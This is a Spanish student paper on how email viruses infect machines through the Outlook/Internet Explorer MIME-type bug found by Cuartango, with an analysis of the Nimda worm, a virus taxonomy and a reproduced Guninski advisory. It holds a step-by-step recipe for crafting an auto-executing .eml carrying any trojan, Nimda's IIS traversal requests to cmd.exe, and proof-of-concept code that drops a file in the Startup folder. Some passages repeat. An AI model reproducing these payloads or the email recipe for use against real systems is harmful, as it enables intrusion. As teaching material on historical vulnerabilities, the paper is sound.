¿Cómo entran los virus a través del correo?

Ampliación de Redes
¿Cómo entran los virus a través del correo?
David Navarro Arnao
INTRODUCCIÓN
La utilidad de este trabajo trata de ser el de aclarar algunos conceptos sobre los virus
informáticos intentando ser un desarrollo del tema de seguridad de la asignatura Ampliación de
Redes.
Pretende dar una idea general del ámbito de los virus informáticos dando una clasificación
de estos y centrándose en un tipo de ellos. Se trata de los virus que se autoejecutan al recibir un
correo electrónico, sin ejecutar adjuntos y ni tan siquiera abrirlos, solo con un previsualización
pueden infectar nuestro sistema, como el Nimda por ejemplo. Por lo tanto no pretendo que esto
sea una extensa guia de los virus y de los fallos de seguridad que aprovechan.
En las conclusiones del trabajo se trataran de dar unas pautas de seguridad para evitar
ser infectados por estos virus autoejecutables.
OBJETIVOS
Este trabajo trata de cumplir con los siguientes objetivos:
-Presentar una clasificación de los virus.
-Particularizar sobre un tipo de virus desarrollando las vulnerabilidades que aprovecha,
como lo hace y que posible solución tiene.
-Ser un trabajo que complemente el tema de la seguridad dentro de la asignatura
Ampliación de Redes.
MOTIVACIÓN Y ANTECEDENTES
La motivación que ha llevado a desarrollar este trabajo es la curiosidad. La curiosidad de
cómo se puede infectar el ordenador al recibir un correo sin realizar ninguna acción de riesgo
(aparente), cumpliendo con consejos como el de no abrir ficheros adjuntos o leer el correo off-line.
Esta será la pregunta que trataré de responder.
El presente trabajo queda fuera del área cubierta por Ampliación de Redes, ya que esta
trató sobre el mantenimiento de la seguridad desde el punto de vista de la identidad de la persona.
Se quería asegurar que se dialogaba con quien se pretendía y no con un impostor. También se
trató de como mantener la información en secreto mediante la criptografía. Otra parte ya más
física explicaba el funcionamiento de tarjetas inteligentes y de diseños de firewalls para LAN's para
evitar intrusos.
Con esto trato de demostrar que la situación del trabajo queda fuera del temario
complementándolo.
DESARROLLO DEL TRABAJO
METODOLOGÍA
El punto de partida del trabajo trató de ser los bugs del Outlook Express confiando que
diese paso a sus parches y que desde ellos sacase una explicación del fallo. Pero los de Microsoft
creen contraproducente que se conozcan los detalles de sus agujeros de seguridad en sus
programas. Así que tuve que cambiar de estrategia y le pedí consejo al profesor Carlos Perez que
amablemente me dio acceso a su página del seminario sobre seguridad. Esta contenía links de
portales sobre seguridad que me han sido muy útiles.
El otro camino a seguir era, evidentemente, las páginas de las compañías de antivirus, las
cuales dan una idea bastante general del asunto y ofrecen una biblioteca de virus sobre la que me
apoye para describir mis ejemplos.
Traté de usar bibliografía, pero no pude encontrar nada concreto sobre el tema que he
desarrollado, así que toda mi fuente de información se basa en la obtenida de links.
DESCRIPCIÓN DEL TRABAJO REALIZADO
Tipos de Virus:
Los virus que existen en la actualidad, se pueden clasificar o agrupar en función de unas
determinadas características. Dependiendo de éstas, algunos de ellos pertenecerán a un
determinado grupo, pero otros podrán incluirse en varios de ellos. Algunos de los criterios que se
tienen en cuenta a la hora de clasificar a los virus, son los siguientes:
-Medio a través del cual realizan su infección.
-Técnicas utilizadas para infectar.
-Técnicas utilizadas para ocultarse y evitar a los antivirus.
-Tipos de archivos que infectan.
-Lugares en los que se esconden, tras la infección.
-Plataforma o sistema operativo al que atacan
A continuación se muestra una clasificación que agrupa parte de los tipos de virus más
habituales:
1. Virus de Fichero
8. Gusanos
2. Virus Residentes
9. Troyanos (caballos de Troya)
3. Virus de Acción Directa
10. Bombas Lógicas
4. Virus de Sobreescritura
11. Encriptados
5. Virus de Compañia
12. Multipartites
6. Virus de Boot
13. Residentes
7. Virus de Macro
14. Polimórficos
La anterior tabla está desarrollada en el Apéndice A con la definición de cada tipo.
¿CÓMO SE INTRODUCEN LOS VIRUS EN NUESTRO PC A TRAVÉS DEL MAIL?
Aunque nos parezca que sólo sucede en las películas, lo cierto es que por el mero hecho
de visitar una página web o ver (incluso previsualizar) un mail que hayamos recibido, es posible
que se esté introduciendo en nuestro PC un programa malicioso, no sólo un gusano (Worm), sino
un programa que permite al atacante tener el control total de nuestro PC.
Son muchos los bugs que se han encontrado en el Outlook y en el Internet Explorer, que
permiten acciones de este tipo, aquí se señalan sólo aquellas que considero mas relevantes, por
ahora explico una de las mas sencillas, la de Cuartango, ( que aprovecha un fallo entre el Outlook
y el Windows Media Player ), y una de las de Guninski, en el apartado de "Webs infectadas"
dentro del manual para el GodWill, en el Apéndice B está el report de Guninski.
El español Juan Carlos García Cuartango descubrió el 30 de Marzo del 2001 una
vulnerabilidad en el Internet Explorer 5 y en el Outlook que permitía, entre otras cosas introducir
en un PC, a través del correo cualquier programa de forma totalmente oculta.
El famoso gusano Nimda, que se localizó el 18-9-2001, es la motivación del presente
trabajo y utiliza este sistema de infección basado en la vulnerabilidad de Cuartango. A
continuación se presenta un análisis profundo del funcionamiento de éste gusano.
El problema radica en los archivos con extensión .EML. Este tipo de archivos contienen
mensajes de correo en formato "MIME Multipart", que es el formato utilizado para enviar cualquier
mensaje de correo vía un servidor SMTP. La pregunta es ¿qué tiene eso que ver con el navegador
IE?. Pues bien; dicho navegador interpreta ese tipo de archivos para visualizar el contenido de un
mensaje de correo.
Adjuntando un archivo ejecutable, y mediante una manipulación a través de un trama
(<IFRAME>) embebida en el cuerpo del mensaje, el navegador IE ejecutará el código contenido en
el archivo adjunto. El asunto parece complicado, pero como un ejemplo vale más que mil palabras,
he puesto un ejemplo que obtuve de Kriptópolis.
En este caso, inhibir los scripts no soluciona el problema, sino que es necesario
descargarse el parche publicado por Microsoft.
Existe otra solución, que consiste en la instalación del reproductor Windows Media Player
7 (con el parche que corrige un importante error de dicho software), o del reproductor Real Audio.
Ésto también puede sonar incomprensible, pero es que el problema parece radicar en un
incorrecto tratamiento de archivos audio por parte del navegador IE, cuando el reproductor de
dichos archivos es el estándar Window Media Player 6.
Aunque parezca mentira es extremadamente sencillo crear un mail malicioso que
introduzca el programa que se desee, estos son los pasos a seguir para comprobar por ti mismo el
grave bug de Microsoft:
Bájandose el ejemplo de Cuartango *exe.eml* y editándolo con un editor de textos se puede
apreciar la siguiente cabecera:
From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
Sustitúyela por:
From: *[email protected]*
To: *[email protected]*
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
I will execute a program<BR>
</BODY>
</HTML>
Aquí viene la clave, se puede ver mas abajo la parte que
pertenece al archivo adjunto del mail.
--1
Content-Type: audio/x-wav;
name="hello.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAA
...
...
AAAAAAAAAAAAAAAAAAAAAAA=
--1
Todo esta cantidad de letras y símbolos, es el binario que va adjunto en el mensaje,
pasado a código BASE 64, pero si nos fijamos vemos que en el campo Content-Type aparece
audio/x-wav, lo cual no se corresponde con el verdadero contenido del archivo, y es aquí donde
radica el fallo encontrado por Cuartango.
Si un atacante se propone introducir en nuestro PC un programa para controlar de forma
remota nuestro PC ( un troyano, un servidor de telnet, de FTP, etc ), lo único que debe hacer es
sustituir esa cantidad de letras y símbolos que se menciona en el párrafo anterior por otro, que
resulte de pasar el programa deseado a BASE 64. Para ello sólo se necesita un programa como el
Wincode si usas windows, o simplemente adjuntar dicho programa a un mail, para después editar
ese mail y sacarlo de ahí.
Una vez que se tenga sólo hay que sustituirlo en el ejemplo.
Ahora el mensaje ya está listo para mandar, pero si se intenta mandar con outlook, nos
encontramos con el problema de que no permite editar los headers (los encabezados del
mensaje), pero si usamos linux no tendremos ningún problema.
Bien, esa es la teoría con ejemplo práctico, pero la realidad viene a continuación.
ANÁLISIS DEL GUSANO NIMDA
El 18 de Septiembre del 2001 (una semana después de los atentados contra las torres de
NY) apareció el gusano Nimda, cuando muchos usuarios comunicaron que estaban sufriendo un
ataque al servidor de web, al tiempo que advirtieron también, que habían recibido un mail con lo
que parecía ser un .wav, la hora de recepción de dicho mail coincidía con el inicio de los ataques
de web.
Se creyó en un principio que se trataba de una variante del Red Code, pero resultó ser un
nuevo gusano llamado Nimda , cuyo nombre oficial es W32/Nimda-A, (NOTA: Nimda es Admin al
revés).
También se le conoce como:
W32.Nimda.A@mm
W32.Nimda
Worm.Nimda.mm
[email protected]
Está programado probablemente en C y afecta a todos los sistemas Microsoft Windows
95, 98, ME, NT, 2000.
En el copyright del gusano se puede leer "Concept Virus(CV) V.5, Copyright(C)2001
R.P.China.", puede ser cierto o no.
Nimda es un gusano que se propaga de cuatro maneras diferentes:
1º Email: Se envía por mail, con un archivo adjunto llamado "readme.exe" y un subject es
variable, utilizando el bug encontrado por Cuartango, el del MIME-type "audio/x-wav", explicado
en este trabajo, y gracias al cual se ejecuta el readme.exe adjunto (que acciona la infección)
aunque solamente se vea el preview del Outlook o Outlook Express, éstos son vulnerables porque
utilizan componentes del Internet Explorer para ver los mensajes con formato HTML.
2º Ataque al Web Server: El gusano busca servidores IIS vulnerables que hayan sido
infectados por el Red Code y que tengan abierta la puerta trasera que éste crea, mediante el
root.exe.
Nimda también trata de acceder a los servidores con IIS mediante los bugs de Unicode y de
Decode.
Utiliza el bug de Unicode para ejecutar el TFTP y bajarse el archivo "admin.dll" desde el
PC atacante, aunque también trata de bajárselo utilizando las puestas traseras dejadas por otros
gusanos como el Red Code.
3º Código web: Nimda añade un código en todos los archivos HTM, HTML y ASP que
encuentre en el servidor de web, con lo cual, los que visiten esas webs serán también infectados.
4º Nimda se propaga también a través de los recursos compartidos que no hayan sido
asegurados, permitiendo el acceso a usuarios no autorizados. Ésto le permite propagarse a través
de redes internas.
Nimda se copia a si mismo con varios nombres "readme.exe", "readme.eml", "riched20.dll",
"admin.dll" porque varias herramientas de oficina, incluidas Microsoft Word y WordPad utilizan el
"riched20.dll", el Nimda se copia a esos programas si se ejecutan desde el mismo directorio en el
que se encuentra.
¿PORQUÉ ES PELIGROSO EL Nimda?
1º Degrada el funcionamiento de la red debido al alto consumo de ancho de banda
durante su propagación, que es extremadamente rápida.
2º Crea o activa la cuenta de "Guest" (invitado) con permisos de Administrador
3º Garantiza el acceso a C:\ como recurso compartido de red, dando acceso a cualquier
usuario.
4º Busca ejecutables y DLL los infecta con el gusano.
5º Busca en el disco local archivos del tipo HTM, HTML, ASP y les añade un código
JavaScript con el que consigue propagarse, y ejecutar el archivo llamado readme.eml que contiene
en el mismo directorio una versión MIME-encoded del Nimda.
Este es JavaScript que ejecuta el readme.eml:
<html><script
language="JavaScript">window.open("readme.eml",
null,"resizable=no,top=6000,left=6000")</script></html>
Todo aquel que visite las páginas infectadas con un navegador vulnerable,
automáticamente se bajará y ejecutará el gusano. Los archivos .eml (mail) y .nws (news) hacen
que el Internet Explorer muestre los contenidos del mensaje, pero dicho mensaje ha sido
modificado para ejecutar el archivo adjunto "readme.exe" con el bug encontrado por Cuartango,
todo ello sin que la víctima se de cuenta.
Todo aquel que visite las páginas infectadas con un navegador vulnerable,
automáticamente se bajará y ejecutará el gusano. Los archivos .eml (mail) y .nws (news) hacen
que el Internet Explorer muestre los contenidos del mensaje, pero dicho mensaje ha sido
modificado para ejecutar el archivo adjunto "readme.exe" con el bug encontrado por Cuartango,
todo ello sin que la víctima se de cuenta.
6º Borra todas las llaves del registro en
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security,con lo que consigue evitar la
seguridad de los recursos compartidos de red.
7º Modifica el System.ini gracias a lo cual se ejecuta en cada inicio.
Esta es una lista de los ataques que Nimda utiliza para busca otros PC´s con
vulnerabilidades:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe
?/c+dir
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
Estos son los nombres que puede tener el Nimda:
readme.exe: Nombre usado en la propagación por email
readme.eml: Nombre utilizado en la propagación mediante páginas web modificadas.
admin.dll: Este nombre es usado durante la transferencia de TFTP desde el PC atacante
hasta la victima.
Este archivo es copiado al root de todos los discos. Existe un admin.dll válido, porque es
parte del FrontPage Server Extensions.
mmc.exe: Nombre utilizado por el gusano durante la primera infección. Este archivo está
en %Windows%\%System%. "mmc.exe" y es el ejecutable del Microsoft Management Console. El
gusano lo sobrescribe si existe.
load.exe: Nombre usado por el gusano cuando se copia a si mismo
%Windows%\%System%.
riched20.dll: El gusano infecta o reemplaza esta DLL. Porque varias herramientas del Office lo
utilizan, incluidos Microsoft Word y WordPad, el gusano infecta estos programas si se infectan
desde su mismo directorio.
Los puertos utilizados son:
TCP 137-139, 445: NetBIOS. Estos puertos son usados durante la transmisión del gusano.
TCP 80: HyperText Transfer Protocol.El gusano lo usa cuando se transporta a través de los HTM
HTML o ASP infectados.
TCP 25 SMTP: A través de este puerto se mandan los mails.
UDP 69 TFTP: Este puerto es el que usa el TFTP cuando el gusano lo ejecuta.
CONCLUSIONES
Creo que los objetivos que se propusieron para este trabajo han sido cumplidos, teniendo
en cuenta cual era la principal motivación del trabajo. Explicar como se pueden infectar nuestros
ordenadores a través del correo electrónico procurando una explicación lo más seria posible. Y
como limpiarlo.
La conclusión a todo esto es que se deben actualizar las versiones de software tanto de
audio como de correo electrónico así como seguir consejos de seguridad como el de no abrir
adjuntos de desconocidos, leer correo off-line y procurar pasar un antivirus al correo.
Lo más increible es que miles de personas hayan sido infectadas por el Nimda cuando
Cuartango nos habia advertido un mes antes de la debilidad del software de Microsoft. Pero me
temos que esta empresa no tomo las medidas oportunas para evitarlo hasta que el mal estuvo
hecho.
APÉNDICE A
1. Virus de Fichero: este tipo de virus se encarga de infectar programas o ficheros
ejecutables (archivos con extensiones EXE o COM). Al realizar la ejecución de uno de
estos programas, de forma directa o indirecta, el virus se activa produciendo los efectos
dañinos que le caractericen en cada caso. La mayoría de los virus existentes son de este
tipo, pudiéndose clasificar cada uno de ellos en función de las acciones que realizan cada
uno de ellos en cada caso.
2.Virus Residentes: cuando se ponen en marcha o activan, la primera acción que realizan
consiste en comprobar si se cumplen todas las condiciones (fecha, hora,... etc.) para
atacar. De no ser así, se colocan en una zona de la memoria RAM, esperando que se
ejecute algún programa. Si en alguna de las operaciones que realiza el sistema operativo
se trabajase con un fichero ejecutable no infectado, el virus lo infectará. Para ello, el virus
se añadirá al programa que infecta, añadiendo su código al propio código del fichero
ejecutable. Algunos virus de este tipo realizan modificaciones en la configuración del
sistema (en el Registro de Windows, entre otros), para volver a colocarse en la memoria
como residentes, siempre que se vuelva a encender o reiniciar el ordenador.
Desde su condición de residentes, interceptarán determinados servicios del sistema
operativo. Dichos servicios pueden ser utilizados por los programas, cuando se están
ejecutando. Esto quiere decir que los virus residentes podrán interferir en las acciones
que lleven a cabo los programas que se estén ejecutando en un determinado momento.
El resultado es que el virus puede alterar los servicios que necesita el programa, para
que apunten o ejecuten partes del código correspondiente al propio virus. Esto implica
que el virus residente se ejecutará siempre que un programa necesite y acceda a los
servicios del sistema operativo.
que lleven a cabo los programas que se estén ejecutando en un determinado momento.
El resultado es que el virus puede alterar los servicios que necesita el programa, para
que apunten o ejecuten partes del código correspondiente al propio virus. Esto implica
que el virus residente se ejecutará siempre que un programa necesite y acceda a los
servicios del sistema operativo.
Ejemplos de virus famosos de este tipo son el Barrotes o el Viernes 13.
3. Virus de Acción Directa: en el momento de su ejecución, el virus trata de replicarse, o
reproducirse. Cumpliéndose unas determinadas condiciones, particulares y específicas
en cada caso, se activará y pasará a realizar infecciones dentro del directorio o carpeta
en el que nos encontremos y dentro de los directorios que se encuentran especificados
en la línea PATH dentro del fichero AUTOEXEC.BAT.
Este tipo de virus puede ser considerado como un virus de fichero ya que buscan
ficheros que puedan ser sus víctimas, para infectarlos. El motivo de que estos virus
realicen copias de sí mismos o se reproduzcan, es debido a que no son residentes y por
lo tanto no permanecen ejecutándose en memoria. Esto les obliga a reproducirse y actuar
directamente.
4. Virus de Sobreescritura: este tipo de virus se caracteriza por no respetar la información
contenida en los ficheros que infecta, haciendo que estos queden inservibles
posteriormente. Pueden encontrarse virus de sobreescritura que además son residentes
y otros que no lo son. Aunque la desinfección es posible, no existe posibilidad de
recuperar los ficheros infectados, siendo la única alternativa posible la eliminación de
éstos. Este tipo de virus puede ser considerado como virus de fichero.
Una característica interesante es que los ficheros infectados por virus de sobreescritura,
no aumentan de tamaño, a no ser que el virus ocupe más espacio que el propio fichero
infectado. Esto es debido a que dicho tipo de virus se coloca encima del contenido del
fichero infectado, no se incluye de forma adicional en una sección del mismo.
5. Virus de Compañía: Al contrario que los virus de sobreescritura o que los residentes,
los virus de compañía no modifican los ficheros que infectan. Cuando el sistema
operativo está trabajando puede ocurrir que éste tenga que ejecutar un programa con un
nombre determinado. Si existen dos ficheros ejecutables con el mismo nombre pero con
diferentes extensiones, el sistema operativo ejecutará en primer lugar el que lleve la
extensión COM. Esta peculiaridad del sistema operativo es aprovechada por los virus de
compañía.
En caso de existir un fichero ejecutable con un determinado nombre y extensión EXE, el
virus se encargará de crear otro fichero con el mismo nombre pero con extensión COM
haciéndolo invisible al usuario para evitar levantar sospechas. Tras realizarse la ejecución
del fichero COM correspondiente al virus, éste devuelve el control al sistema operativo
para que ejecute el fichero EXE. De esta forma el usuario no tendrá conocimiento de la
infección que en ese preciso instante ha tenido lugar. En definitiva, un virus de compañía,
seguirá los siguientes pasos:
6. Virus de Boot (sector de arranque): Este tipo de virus, no afectan a los ficheros por lo
que el contenido del disco no estará en peligro a no ser que se intente arrancar el
ordenador con dicho disco. Si esto ocurre, el virus realizará la infección siguiendo una
serie de pasos habituales:
Se oculta en un determinado sector del disco infectado.
Reserva un determinado espacio en memoria para que éste no sea ocupado por ningún
otro programa.
Reserva un determinado espacio en memoria para que éste no sea ocupado por ningún
otro programa.
Se coloca en esa zona reservada de la memoria.
Desde esa posición de memoria, intercepta servicios del sistema operativo.
A partir de este momento, ocurrirá lo siguiente:
Siempre que una aplicación del sistema operativo llame a una función de acceso a
ficheros, el virus toma el control.
Se comprueba si el disco al que se accede esta infectado. Si no lo está, lo infecta.
El virus vuelve a colocar el sector de arranque original (sin infectar).
Se modifica el boot original, escribiendo el código vírico en él.
De esta forma el virus cede el control al sistema operativo. Así parecerá no haber
ocurrido nada.
Si introducimos un disquete infectado en un ordenador, la infección podría extenderse al
disco duro. En tal caso, se vería afectado el MBR (Master Boot Record) del disco duro.
Esto implica que todos los tipos de discos (disquete, CD-ROM, unidades Zip, Unidades
Jazz,...) que utilicemos posteriormente en el ordenador infectado, serán igualmente
infectados.
Estos virus se encargan de guardar una copia del Boot original, pero cada uno de ellos lo
puede hacer de una forma diferente. Algunos los copiarán en una determinada sección
del disco y la marcarán como defectuosa. Otros lo almacenan en una sección del disco
donde ya hubiese información, perdiéndose esta (y siendo imposible de recuperar dicha
información). Finalmente los más agresivos o peligrosos sobreescriben el boot original,
impidiendo el arranque del ordenador con dicho disco.
7. Virus de Macro: los virus de macro realizan infecciones sobre los ficheros
(documentos, libros, presentaciones y/o bases de datos) que se han creado con
determinadas aplicaciones. Cada uno de estos tipos de ficheros puede tener
adicionalmente unos pequeños programas, denominados macros. Una macro no es más
que un micro-programa que el usuario asocia al fichero que ha creado con determinadas
aplicaciones. Éste no depende del sistema operativo sino de acciones determinadas que
el usuario puede realizar dentro del documento que la contiene. Mediante ellos es posible
automatizar conjuntos de operaciones para que se lleven a cabo como una sola acción
del usuario de forma independiente sin necesidad de realizarlas una a una manualmente.
Pues bien, estas macros podrían infectarse. En este caso, al abrir un documento que
contenga macros, éstas se cargarán de forma automática. Entonces el virus actuará. Al
diferencia de lo que se piensa habitualmente, los virus de macro pueden realizar acciones
dañinas de bastante importancia, propagándose en poco tiempo de forma muy rápida.
Las aplicaciones afectadas son Microsoft Word, Excel, Access, Powerpoint, Multi Macro
Partite, Lotus Ami Pro y Corel Draw.
Ejemplos famosos son: Melissa, Lewinsky, Y2K.
8. Virus de enlace o de directorio: Estos virus se encargan de alterar las direcciones de
los programas y directorios para provocar la infección de un determinado fichero. Si un
programa se encuentra en una dirección concreta, para ejecutarlo habrá que acceder a
dicha dirección. Sin embargo, el virus de enlace o directorio la habrá modificado con
8. Virus de enlace o de directorio: Estos virus se encargan de alterar las direcciones de
los programas y directorios para provocar la infección de un determinado fichero. Si un
programa se encuentra en una dirección concreta, para ejecutarlo habrá que acceder a
dicha dirección. Sin embargo, el virus de enlace o directorio la habrá modificado con
anterioridad. Lo que hace es alterar esta dirección (dentro de la FAT) para que apunte al
lugar en el que se encuentra el virus, guardando en otro lugar la dirección de acceso
correcta. De esta forma, cuando se pretenda ejecutar el fichero, lo que se hará realmente
es ejecutar el virus.
Ya que este tipo de virus puede modificar las direcciones donde se encuentran todos los
ficheros del disco (disco duro), su capacidad para infectar TODOS éstos es real. De este
modo, los virus de enlace o directorio pueden infectar toda la información contenida en un
disco, pero les es imposible realizar infecciones en unidades de red o agregarse a los
ficheros infectados. En caso de realizar un análisis del disco en busca de errores
(mediante programas como SCANDISK o CHKDSK), se detectarán grandes cantidades
de errores que identifican todos los enlaces a los ficheros que el virus ha modificado. No
obstante, en este caso sería mejor no recuperarlos ya que podría producirse un caos en
lo que al sistema de almacenamiento de la información se refiere, que sería más
perjudicial si cabe.
9. Gusanos (Worms): los gusanos se diferencian de los virus en que no intentan infectar
otros ficheros. Su único objetivo es propagarse o expandirse a otros ordenadores de la
forma más rápida posible. Por otra parte, emplean técnicas para replicarse (propagarse).
En realidad su objetivo es crear copias de sí mismos y con ellas realizar infecciones en
otros ordenadores. Las infecciones producidas o reproducciones que éstos realizan casi
siempre a través de medios como el correo electrónico, las redes de ordenadores y los
canales de IRC en Internet. También es posible que se repliquen dentro de la memoria
del PC.
Cuando un gusano es ejecutado, permanece así hasta que se apaga o se reinicia el
ordenador. No obstante cada uno de ellos utiliza técnicas diferentes para asegurar su
ejecución siempre que se arranca el ordenador y se entra en Windows. Por ejemplo la
modificación del Registro de Windows.
Por otra parte, podría darse en caso de que el gusano estuviese compuesto por varios
programas. En tal caso, cada uno de ellos actuará de forma subordinada a uno de éstos
que se considerará principal. Esta variación, suele ser denominado como gusano de red.
Dependiendo del lenguaje en el que estén escritos, las técnicas utilizadas para
propagarse y otras características, los gusanos pueden ser de varios tipos:
Gusanos de correo electrónico. Son gusanos que se propagan a través de mensajes de
correo electrónico, mediante la utilización de programas clientes de correo.
Gusanos de IRC (gusanos de mIRC y de Pirch). Son gusanos que se propagan a través
de canales de IRC (Chat). Los programas de IRC que emplean habitualmente para ello,
son mIRC y Pirch.
Gusanos de VBS (Visual Basic Script). Son gusanos escritos o creados en Visual Basic
Script.
Gusanos de Windows32. Son gusanos que se propagan a través de las API de Windows
(las funciones pertenecientes a un determinado protocolo de Internet).
Ejemplos de este tipo de virus son: Happy99, Pretty Park, I love you, etc...
10. Troyanos (Caballos de Troya): los troyanos no se pueden considerar virus como
tales. Recogen su nombre de la mitología (el famoso caballo de madera en el que se
escondieron los soldados para entrar a la ciudad de forma aparentemente inofensiva,
cuando lo que pretendían era realmente hacerse con ella). Del mismo modo funcionan los
troyanos. Éstos parecen ser programas inofensivos que llegan a nuestro ordenador por
cualquier medio. Cuando ejecutamos este programa (llevarán nombres o tendrán
características que nos incitarán a ello), se instalará en nuestro ordenador otro programa
que podrá producir efectos destructivos.
En un principio, el troyano podría no activar sus efectos. De todas formas, cuando esto
ocurra, se podrán eliminar ficheros, perder la información del disco duro, o abrirse los
posibles huecos de seguridad a modo de puestas traseras (backdoor) por las que nuestro
equipo podría ser atacado.
La mayoría de ellos se encargan de acceder a determinados puertos de comunicaciones
y abrirlos o dejarlos accesibles desde el exterior. En tal caso, a través de una conexión
(en una red local o a través de Internet) alguien podría acceder a toda la información
contenida en nuestro equipo, enviar esta información a otras direcciones y realizar
cualquier tipo de operación sin nuestro consentimiento.
11. Bombas Lógicas: éstos se encargan de activarse y producir destrozos de
consideración en el equipo al que han infectado, sólo cuando se cumple/n una/s
determinada/s condición/es. No se consideran virus como tales, ya que no se
reproducen, sino que dependen de las acciones realizadas que lleve a cabo el usuario
(éste debe copiarlos y/o ejecutarlos, de forma generalmente no intencionada).
12. Encriptados: más que un tipo de virus, se trata de una técnica que éstos pueden
utilizar. Por este motivo, los virus que la utilizan (pudiendo pertenecer a otros tipos o
categorías), se suelen denominar también encriptados. Esto es, el virus se cifra, codifica
o "encripta" a sí mismo para no ser fácilmente detectado por los programas antivirus.
Para realizar sus actividades, el virus se descifra a sí mismo y cuando ha finalizado, se
vuelve a cifrar.
13. Multipartites: este tipo de virus pueden realizar múltiples infecciones y hacerlo
además utilizando diferentes técnicas para ello. Su objetivo es cualquier elemento que
pueda ser infectado: archivos, programas, macros, discos,... etc. Se consideran bastante
peligrosos por su capacidad de combinar muchos técnicas de infección y las acciones
que pueden llegar a realizar.
14. Polimórficos: son virus que emplean una nueva técnica para dificultar su detección
por parte de los programas antivirus (generalmente, son los virus que más cuesta
detectar). En este caso varían en cada una de las infecciones que llevan a cabo. De esta
forma, generan una elevada cantidad de copias de sí mismos.
Los virus polimórficos se encriptan o cifran de forma diferente (utilizando diferentes
algoritmos y claves de cifrado), en cada una de las infecciones que realizan. Esto hace
que no se puedan detectar a través de la búsqueda de cadenas o firmas (ya que éstas
serán diferentes en cada cifrado).
APÉNDICE B
Georgi Guninski security advisory #23, 2000
IE 5.5/Outlook security vulnerability executing arbitrary programs
com.ms.activeX.ActiveXComponent allows
Systems affected:
IE 5.5/Outlook/Outlook Express - probably other versions, have not tested
Risk: High
Date: 5 October 2000
Legal Notice:
This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the author's written
permission.
Disclaimer:
The opinions expressed in this advisory and program are my own and not of any
company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or indirect use of the information or
functionality provided by this advisory or program.
Georgi Guninski, bears no responsibility for content or misuse of this advisory or program
or any derivatives thereof.
Description:
Internet Explorer 5.5/Outlook allow executing arbitray programs after viewing web page
or email message. This may lead to taking full control over user's computer.
Details:
The problem is the com.ms.activeX.ActiveXComponent java object which may be
instantiated
from <APPLET> tag (it throws security exception in java console, but returns object,
strange).
The com.ms.activeX.ActiveXComponent java object allows creating and scripting arbitrary
ActiveX objects, including those not marked safe for scripting.
Examine the code below for more information.
The code is:
---------javaea.html-----------------------------------------<APPLET code="com.ms.activeX.ActiveXComponent" >
</APPLET>
<!-- ^^^ This gives java exceptions in java console, but the object is instantiated -->
<SCRIPT LANGUAGE="JAVASCRIPT">
a1=document.applets[0];
fn="..\\\\Start Menu\\\\Programs\\\\Startup\\\\EA.HTA";
//fn="EA.HTA";
doc="<SCRIPT>s1=\'Hello world\\nTo get rid of this, delete the file EA.HTA in Startup
folder\';alert(s1);document.body.innerHTML=s1</"+"SCRIPT>";
function f1()
{
a1.setProperty('DOC',doc);
}
function f()
{
// The ActiveX classid
cl="{06290BD5-48AA-11D2-8432-006008C3FBFC}";
a1.setCLSID(cl);
a1.createInstance();
setTimeout("a1.setProperty('Path','"+fn+"')",1000);
setTimeout("f1()",1500);
setTimeout("a1.invoke('write',VA);alert('"+fn+" created');",2000);
}
setTimeout("f()",1000)
</SCRIPT>
<SCRIPT LANGUAGE="VBSCRIPT">
VA = ARRAY()
' Just to get something like com.ms.com.Variant[]
</SCRIPT>
-----------------------------------------------------Regarding this issue and Outlook with "security update" (probably this should be another
advisory).
It is a bit more difficult to exploit this from Outlook because of the "Outlook security
update" which stops "most scripting". It is common misbelief that the "Outlook security
update"
stops all scripting, but this is not true.
It is possible to trigger the execution of Active Script from email message
with the help of Java.
Send
a
email
message
containing
<IFRAME
SRC="http://somehost/javascript.html"></IFRAME>
-----------javascript.html------------<APPLET CODE="outlookjs.class" MAYSCRIPT>
<PARAM NAME="command" VALUE="window.open('http://www.guninski.com')">
</APPLET>
------------------------------------------------outlookjs.java--------------import java.applet.Applet;
import netscape.javascript.*;
class outlookjs extends Applet {
public JSObject j;
public void init()
{
try {
j=(JSObject) JSObject.getWindow(this);
j.eval(getParameter("command"));
}
catch (Exception e) {System.out.println(e);};
}
}
--------------------------------------Workaround:
Disable Active Scripting or Java or Scripting of Java applets - better disable all active
content in IE.
Demostration that executes programs is available
Demostration that places a file on Desktop is available
APÉNDICE C
Desinfección del Nimda:
Los pasos para desinfectar el Nimda han sido sacados de la Incidents Mailing list de
Jeffrey Isherwood
Reparar las llaves modificadas del registro:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
HideFileExt
